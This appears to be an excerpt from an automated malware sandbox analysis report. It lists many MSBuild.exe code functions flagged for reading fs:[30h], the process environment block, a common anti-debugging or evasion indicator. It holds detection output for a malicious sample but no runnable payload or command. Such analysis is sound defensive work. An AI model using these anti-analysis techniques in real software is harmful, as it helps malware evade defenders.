                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5E3F0 mov eax, dword ptr fs:[00000030h]10_2_01A5E3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A763FF mov eax, dword ptr fs:[00000030h]10_2_01A763FF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFC3CD mov eax, dword ptr fs:[00000030h]10_2_01AFC3CD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]10_2_01A4A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]10_2_01A4A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]10_2_01A4A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]10_2_01A4A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]10_2_01A4A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]10_2_01A4A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A483C0 mov eax, dword ptr fs:[00000030h]10_2_01A483C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A483C0 mov eax, dword ptr fs:[00000030h]10_2_01A483C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A483C0 mov eax, dword ptr fs:[00000030h]10_2_01A483C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A483C0 mov eax, dword ptr fs:[00000030h]10_2_01A483C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFB3D0 mov ecx, dword ptr fs:[00000030h]10_2_01AFB3D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F32A mov eax, dword ptr fs:[00000030h]10_2_01A6F32A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A37330 mov eax, dword ptr fs:[00000030h]10_2_01A37330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0132D mov eax, dword ptr fs:[00000030h]10_2_01B0132D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0132D mov eax, dword ptr fs:[00000030h]10_2_01B0132D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC930B mov eax, dword ptr fs:[00000030h]10_2_01AC930B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC930B mov eax, dword ptr fs:[00000030h]10_2_01AC930B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC930B mov eax, dword ptr fs:[00000030h]10_2_01AC930B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7A30B mov eax, dword ptr fs:[00000030h]10_2_01A7A30B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7A30B mov eax, dword ptr fs:[00000030h]10_2_01A7A30B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7A30B mov eax, dword ptr fs:[00000030h]10_2_01A7A30B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3C310 mov ecx, dword ptr fs:[00000030h]10_2_01A3C310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A60310 mov ecx, dword ptr fs:[00000030h]10_2_01A60310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFF367 mov eax, dword ptr fs:[00000030h]10_2_01AFF367
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AE437C mov eax, dword ptr fs:[00000030h]10_2_01AE437C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A47370 mov eax, dword ptr fs:[00000030h]10_2_01A47370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A47370 mov eax, dword ptr fs:[00000030h]10_2_01A47370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A47370 mov eax, dword ptr fs:[00000030h]10_2_01A47370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0A352 mov eax, dword ptr fs:[00000030h]10_2_01B0A352
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]10_2_01AC2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]10_2_01AC2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]10_2_01AC2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]10_2_01AC2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]10_2_01AC2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]10_2_01AC2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]10_2_01AC2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]10_2_01AC2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]10_2_01AC2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]10_2_01AC2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]10_2_01AC2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]10_2_01AC2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]10_2_01AC2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]10_2_01AC2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC2349 mov eax, dword ptr fs:[00000030h]10_2_01AC2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3D34C mov eax, dword ptr fs:[00000030h]10_2_01A3D34C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3D34C mov eax, dword ptr fs:[00000030h]10_2_01A3D34C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B15341 mov eax, dword ptr fs:[00000030h]10_2_01B15341
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A39353 mov eax, dword ptr fs:[00000030h]10_2_01A39353
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A39353 mov eax, dword ptr fs:[00000030h]10_2_01A39353
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC035C mov eax, dword ptr fs:[00000030h]10_2_01AC035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC035C mov eax, dword ptr fs:[00000030h]10_2_01AC035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC035C mov eax, dword ptr fs:[00000030h]10_2_01AC035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC035C mov ecx, dword ptr fs:[00000030h]10_2_01AC035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC035C mov eax, dword ptr fs:[00000030h]10_2_01AC035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC035C mov eax, dword ptr fs:[00000030h]10_2_01AC035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A502A0 mov eax, dword ptr fs:[00000030h]10_2_01A502A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A502A0 mov eax, dword ptr fs:[00000030h]10_2_01A502A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A552A0 mov eax, dword ptr fs:[00000030h]10_2_01A552A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A552A0 mov eax, dword ptr fs:[00000030h]10_2_01A552A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A552A0 mov eax, dword ptr fs:[00000030h]10_2_01A552A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A552A0 mov eax, dword ptr fs:[00000030h]10_2_01A552A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD62A0 mov eax, dword ptr fs:[00000030h]10_2_01AD62A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD62A0 mov ecx, dword ptr fs:[00000030h]10_2_01AD62A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD62A0 mov eax, dword ptr fs:[00000030h]10_2_01AD62A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD62A0 mov eax, dword ptr fs:[00000030h]10_2_01AD62A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD62A0 mov eax, dword ptr fs:[00000030h]10_2_01AD62A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD62A0 mov eax, dword ptr fs:[00000030h]10_2_01AD62A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD72A0 mov eax, dword ptr fs:[00000030h]10_2_01AD72A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD72A0 mov eax, dword ptr fs:[00000030h]10_2_01AD72A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC92BC mov eax, dword ptr fs:[00000030h]10_2_01AC92BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC92BC mov eax, dword ptr fs:[00000030h]10_2_01AC92BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC92BC mov ecx, dword ptr fs:[00000030h]10_2_01AC92BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC92BC mov ecx, dword ptr fs:[00000030h]10_2_01AC92BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B092A6 mov eax, dword ptr fs:[00000030h]10_2_01B092A6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B092A6 mov eax, dword ptr fs:[00000030h]10_2_01B092A6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B092A6 mov eax, dword ptr fs:[00000030h]10_2_01B092A6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B092A6 mov eax, dword ptr fs:[00000030h]10_2_01B092A6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E284 mov eax, dword ptr fs:[00000030h]10_2_01A7E284
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E284 mov eax, dword ptr fs:[00000030h]10_2_01A7E284
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC0283 mov eax, dword ptr fs:[00000030h]10_2_01AC0283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC0283 mov eax, dword ptr fs:[00000030h]10_2_01AC0283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC0283 mov eax, dword ptr fs:[00000030h]10_2_01AC0283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B15283 mov eax, dword ptr fs:[00000030h]10_2_01B15283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7329E mov eax, dword ptr fs:[00000030h]10_2_01A7329E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7329E mov eax, dword ptr fs:[00000030h]10_2_01A7329E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF12ED mov eax, dword ptr fs:[00000030h]10_2_01AF12ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF12ED mov eax, dword ptr fs:[00000030h]10_2_01AF12ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF12ED mov eax, dword ptr fs:[00000030h]10_2_01AF12ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF12ED mov eax, dword ptr fs:[00000030h]10_2_01AF12ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF12ED mov eax, dword ptr fs:[00000030h]10_2_01AF12ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF12ED mov eax, dword ptr fs:[00000030h]10_2_01AF12ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF12ED mov eax, dword ptr fs:[00000030h]10_2_01AF12ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF12ED mov eax, dword ptr fs:[00000030h]10_2_01AF12ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF12ED mov eax, dword ptr fs:[00000030h]10_2_01AF12ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF12ED mov eax, dword ptr fs:[00000030h]10_2_01AF12ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF12ED mov eax, dword ptr fs:[00000030h]10_2_01AF12ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF12ED mov eax, dword ptr fs:[00000030h]10_2_01AF12ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF12ED mov eax, dword ptr fs:[00000030h]10_2_01AF12ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF12ED mov eax, dword ptr fs:[00000030h]10_2_01AF12ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A502E1 mov eax, dword ptr fs:[00000030h]10_2_01A502E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A502E1 mov eax, dword ptr fs:[00000030h]10_2_01A502E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A502E1 mov eax, dword ptr fs:[00000030h]10_2_01A502E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B152E2 mov eax, dword ptr fs:[00000030h]10_2_01B152E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFF2F8 mov eax, dword ptr fs:[00000030h]10_2_01AFF2F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A392FF mov eax, dword ptr fs:[00000030h]10_2_01A392FF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A492C5 mov eax, dword ptr fs:[00000030h]10_2_01A492C5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A492C5 mov eax, dword ptr fs:[00000030h]10_2_01A492C5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6B2C0 mov eax, dword ptr fs:[00000030h]10_2_01A6B2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6B2C0 mov eax, dword ptr fs:[00000030h]10_2_01A6B2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6B2C0 mov eax, dword ptr fs:[00000030h]10_2_01A6B2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6B2C0 mov eax, dword ptr fs:[00000030h]10_2_01A6B2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6B2C0 mov eax, dword ptr fs:[00000030h]10_2_01A6B2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6B2C0 mov eax, dword ptr fs:[00000030h]10_2_01A6B2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6B2C0 mov eax, dword ptr fs:[00000030h]10_2_01A6B2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4A2C3 mov eax, dword ptr fs:[00000030h]10_2_01A4A2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4A2C3 mov eax, dword ptr fs:[00000030h]10_2_01A4A2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4A2C3 mov eax, dword ptr fs:[00000030h]10_2_01A4A2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4A2C3 mov eax, dword ptr fs:[00000030h]10_2_01A4A2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4A2C3 mov eax, dword ptr fs:[00000030h]10_2_01A4A2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3B2D3 mov eax, dword ptr fs:[00000030h]10_2_01A3B2D3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3B2D3 mov eax, dword ptr fs:[00000030h]10_2_01A3B2D3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3B2D3 mov eax, dword ptr fs:[00000030h]10_2_01A3B2D3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F2D0 mov eax, dword ptr fs:[00000030h]10_2_01A6F2D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F2D0 mov eax, dword ptr fs:[00000030h]10_2_01A6F2D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B15227 mov eax, dword ptr fs:[00000030h]10_2_01B15227
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3823B mov eax, dword ptr fs:[00000030h]10_2_01A3823B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A77208 mov eax, dword ptr fs:[00000030h]10_2_01A77208
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A77208 mov eax, dword ptr fs:[00000030h]10_2_01A77208
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A44260 mov eax, dword ptr fs:[00000030h]10_2_01A44260
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A44260 mov eax, dword ptr fs:[00000030h]10_2_01A44260
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A44260 mov eax, dword ptr fs:[00000030h]10_2_01A44260
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3826B mov eax, dword ptr fs:[00000030h]10_2_01A3826B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A69274 mov eax, dword ptr fs:[00000030h]10_2_01A69274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A81270 mov eax, dword ptr fs:[00000030h]10_2_01A81270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A81270 mov eax, dword ptr fs:[00000030h]10_2_01A81270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0D26B mov eax, dword ptr fs:[00000030h]10_2_01B0D26B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0D26B mov eax, dword ptr fs:[00000030h]10_2_01B0D26B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]10_2_01AF0274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]10_2_01AF0274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]10_2_01AF0274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]10_2_01AF0274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]10_2_01AF0274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]10_2_01AF0274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]10_2_01AF0274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]10_2_01AF0274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]10_2_01AF0274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]10_2_01AF0274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]10_2_01AF0274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF0274 mov eax, dword ptr fs:[00000030h]10_2_01AF0274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A39240 mov eax, dword ptr fs:[00000030h]10_2_01A39240
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A39240 mov eax, dword ptr fs:[00000030h]10_2_01A39240
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7724D mov eax, dword ptr fs:[00000030h]10_2_01A7724D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3A250 mov eax, dword ptr fs:[00000030h]10_2_01A3A250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFB256 mov eax, dword ptr fs:[00000030h]10_2_01AFB256
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFB256 mov eax, dword ptr fs:[00000030h]10_2_01AFB256
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A46259 mov eax, dword ptr fs:[00000030h]10_2_01A46259
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC05A7 mov eax, dword ptr fs:[00000030h]10_2_01AC05A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC05A7 mov eax, dword ptr fs:[00000030h]10_2_01AC05A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC05A7 mov eax, dword ptr fs:[00000030h]10_2_01AC05A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615A9 mov eax, dword ptr fs:[00000030h]10_2_01A615A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615A9 mov eax, dword ptr fs:[00000030h]10_2_01A615A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615A9 mov eax, dword ptr fs:[00000030h]10_2_01A615A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615A9 mov eax, dword ptr fs:[00000030h]10_2_01A615A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615A9 mov eax, dword ptr fs:[00000030h]10_2_01A615A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFF5BE mov eax, dword ptr fs:[00000030h]10_2_01AFF5BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F5B0 mov eax, dword ptr fs:[00000030h]10_2_01A6F5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F5B0 mov eax, dword ptr fs:[00000030h]10_2_01A6F5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F5B0 mov eax, dword ptr fs:[00000030h]10_2_01A6F5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F5B0 mov eax, dword ptr fs:[00000030h]10_2_01A6F5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F5B0 mov eax, dword ptr fs:[00000030h]10_2_01A6F5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F5B0 mov eax, dword ptr fs:[00000030h]10_2_01A6F5B0
